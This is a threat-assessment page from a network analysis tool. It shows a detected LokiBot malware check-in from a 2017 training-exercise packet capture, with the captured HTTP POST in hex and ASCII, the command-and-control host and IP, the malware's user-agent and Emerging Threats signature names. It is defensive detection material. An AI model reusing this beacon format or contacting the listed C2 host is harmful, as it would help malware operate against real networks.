« Back to Threat Assessment « Previous Threat | Next Threat »

LokiBot Checkin detected in 2017-11-21-traffic-analysis-exercise-2-of-6.pcap

Time Packet Protocol Source Destination Additional Threats
2017/11/21 00:13:59 +0000 15193 HTTP / tcp 10.192.1.157:49288 185.118.166.155:80 source | dest | ip pair

Payload (272 bytes) show as: hex | ascii | follow stream

00000000 00000010 00000020 00000030 00000040 00000050 00000060 00000070 00000080 00000090 000000A0 000000B0 000000C0 000000D0 000000E0 000000F0 00000100
50 4f 53 54 20 2f 77 70  2d 61 64 6d 69 6e 2f 63 73 73 2f 63 6f 6c 6f 72  73 2f 62 6c 75 65 2f 50 61 6e 65 6c 2f 66 69 76  65 2f 66 72 65 2e 70 68 70 20 48 54 54 50 2f 31  2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20  4d 6f 7a 69 6c 6c 61 2f 34 2e 30 38 20 28 43 68  61 72 6f 6e 3b 20 49 6e 66 65 72 6e 6f 29 0d 0a  48 6f 73 74 3a 20 74 63 6f 6f 6c 6f 6e 6c 69 6e  65 2e 6d 6f 62 69 0d 0a 41 63 63 65 70 74 3a 20  2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70  65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f  63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e  74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 62  69 6e 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 4b  65 79 3a 20 45 41 30 35 35 37 36 34 0d 0a 43 6f  6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30  34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63  6c 6f 73 65 0d 0a 0d 0a
POST /wp -admin/c ss/color s/blue/P anel/fiv e/fre.ph p HTTP/1 .0..User -Agent:  Mozilla/ 4.08 (Ch aron; In ferno).. Host: tc oolonlin e.mobi.. Accept:  */*..Con tent-Typ e: appli cation/o ctet-str eam..Con tent-Enc oding: b inary..C ontent-K ey: EA05 5764..Co ntent-Le ngth: 20 4..Conne ction: c lose....

2 Alerts

Alerts provided by Emerging Threats 2022-04-08
Signature Category SID.rev Rule Set
1 LokiBot Checkin Malware Command and Control Activity Detected 2025381.5 ET MALWARE
1 LokiBot User-Agent (Charon/Inferno) A Network Trojan was detected 2021641.7 ET MALWARE

External References

There are no references available for these alerts.

Community ID

Community ID is an open standard for hashing network flows into identifiers and can be used to correlate connections across different tools.

Zeek: conn.log: 1:AuNn9vwZBdd/aoP9f7+UlmtGdUY=